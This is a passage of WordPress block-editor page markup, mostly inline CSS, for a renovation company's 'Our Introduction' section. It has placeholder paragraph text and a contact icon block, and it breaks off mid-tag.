.block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-f55ba5b9-42b3-4ff0-9a0a-564a1640e0af skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"3bc99896-2b5b-42fe-afa6-971674d2cb49\"} -->\n<style type=\"text/css\"> .block-3bc99896-2b5b-42fe-afa6-971674d2cb49 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3bc99896-2b5b-42fe-afa6-971674d2cb49 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3bc99896-2b5b-42fe-afa6-971674d2cb49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3bc99896-2b5b-42fe-afa6-971674d2cb49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3bc99896-2b5b-42fe-afa6-971674d2cb49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3bc99896-2b5b-42fe-afa6-971674d2cb49\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-large is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"0a4cceec-d53f-4db2-812f-a15c82e4fe52\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-0a4cceec-d53f-4db2-812f-a15c82e4fe52 background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-0a4cceec-d53f-4db2-812f-a15c82e4fe52.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"a062bb15-a78a-4350-be3a-3739c7a2bc28\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a062bb15-a78a-4350-be3a-3739c7a2bc28 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-a062bb15-a78a-4350-be3a-3739c7a2bc28\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"5b1cfe4b-2df1-4650-86cc-8b60a879c843\"} -->\n<style type=\"text/css\"> .block-5b1cfe4b-2df1-4650-86cc-8b60a879c843 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5b1cfe4b-2df1-4650-86cc-8b60a879c843 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5b1cfe4b-2df1-4650-86cc-8b60a879c843 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5b1cfe4b-2df1-4650-86cc-8b60a879c843 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5b1cfe4b-2df1-4650-86cc-8b60a879c843 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5b1cfe4b-2df1-4650-86cc-8b60a879c843\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"8b1f5966-b2c5-409f-a2d8-81f5483a9822\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8b1f5966-b2c5-409f-a2d8-81f5483a9822 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-8b1f5966-b2c5-409f-a2d8-81f5483a9822\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Our<br>Renovation Group of<br>Company</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy telluseu semper nunc finibus placerat. Suspendissee potenti. Praesent vel sem in sem vulputate.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"89bc752d-a3ed-4365-a51f-9d4c795749b9\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-89bc752d-a3ed-4365-a51f-9d4c795749b9 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9 .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-89bc752d-a3ed-4365-a51f-9d4c795749b9.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"a5f17d88-6d43-4641-a46c-eadaddd85344\"} -->\n<style type=\"text/css\"> .block-a5f17d88-6d43-4641-a46c-eadaddd85344 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-a5f17d88-6d43-4641-a46c-eadaddd85344 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-a5f17d88-6d43-4641-a46c-eadaddd85344 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-a5f17d88-6d43-4641-a46c-eadaddd85344 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a5f17d88-6d43-4641-a46c-eadaddd85344 .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a5f17d88-6d43-4641-a46c-eadaddd85344 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a5f17d88-6d43-4641-a46c-eadaddd85344 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a5f17d88-6d43-4641-a46c-eadaddd85344 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"a99ce411-1f70-439d-8529-2b17e168518c\"} -->\n<style type=\"text/css\"> .block-a99ce411-1f70-439d-8529-2b17e168518c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-a99ce411-1f70-439d-8529-2b17e168518c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-a99ce411-1f70-439d-8529-2b17e168518c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-a99ce411-1f70-439d-8529-2b17e168518c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a99ce411-1f70-439d-8529-2b17e168518c .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-a99ce411-1f70-439d-8529-2b17e168518c\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"8ed6f8b8-f938-4dc9-8385-38574158bc9a\"} -->\n<style type=\"text/css\"> .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-8ed6f8b8-f938-4dc9-8385-38574158bc9a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   